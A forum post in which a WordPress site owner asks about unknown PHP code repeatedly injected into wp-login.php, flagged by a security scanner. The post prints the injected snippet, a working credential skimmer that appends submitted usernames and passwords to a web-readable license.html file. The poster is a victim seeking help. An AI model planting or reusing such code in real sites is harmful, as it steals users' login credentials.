Malware in wp-login.php ??? Unknown code appearing out of nowhere

Hi everyone.
I’m running a site with wp 3.5.1 and Wordfence scans all files against the repository regularly. I’m getting a new warning every day that a core file has been modified (wp-login.php).

When I look at what has been changed, I find this code in my wp-login.php but I’m not sure where it comes from or what it does (or tries to do).

<?php
if (isset($_POST["pwd"])) {
$l0gin = $_POST["log"]."<br />".$_POST["pwd"]."<br /><br />";
$f1le = "license.html";
$d4tei = fopen($f1le, "a");
fwrite ($d4tei, $l0gin);
fclose ($d4tei);
};
?>

As far as I can see with my limited PHP knowledge, It tries to write my login name and password into a File called license.html (so someone with bad intentions can easily read it).. Is that assumption true?

And if it is, it’s malware, right? But where does it come from? How does it manage to make changes to my wp-login???

Thanks so much for any information on this!
Anja